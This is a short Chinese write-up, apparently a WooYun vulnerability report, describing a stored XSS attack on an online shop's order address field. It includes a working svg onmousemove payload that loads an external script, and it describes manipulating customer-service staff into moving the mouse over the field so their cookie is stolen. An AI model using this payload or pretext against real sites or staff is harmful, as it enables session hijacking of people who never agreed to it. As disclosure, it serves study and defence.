WooYun.org

嘛，带着我含有恶意代码的地址去买东西去，结果提交购物车的时候出现这个。。。

看来这个地址在这里又经过了一次，这里我又想到用<svg>隔断敏感字符，结果这里<svg>原样输出了。。看来方法是不对
但是这里有一个好消息是并没有对我们输入的尖括号转义，这里<svg>原样输出了，说明svg在这里不是关键字了，那么就用没过滤的<svg>构造吧
先搜索了一下svg支持的事件，先试试这里面的

http://group.cnblogs.com/topic/44023.html

发现onmousemove没有被过滤，那么最后构造如下<svg onmousemove="s=createElement('script');body.appendChild(s);s.src='xxx';" width="100%" height="100%">
还好，这里在字符串中的script并没有被黑名单过滤，提交之后再查看订单就看见代码已经成功插入了

这里触发xss有一个条件就是需要鼠标移动到代码对应的区域，为了增加触发几率，设置width=100% height=100%
=======================================================
等了几天之后发现还没有收到cookie，猜想可能是他们后台自动发货的原因整个过程并没有管理人员的参与
那么就跟客服聊聊天，问一下订单到了没有，这里有一个问题就是，如果直接告诉客服快递单号那么客服会经过一个快递公司的接口查询这样的话并不会返回恶意代码
所以我最后让客服帮忙核对了一下我填写的电话，这里有一个下意识的操作

在检查电话这样的字符串的时候，鼠标会随着自己的视线移动

那么当客服鼠标移动的时候就触发了xss代码，收到cookie了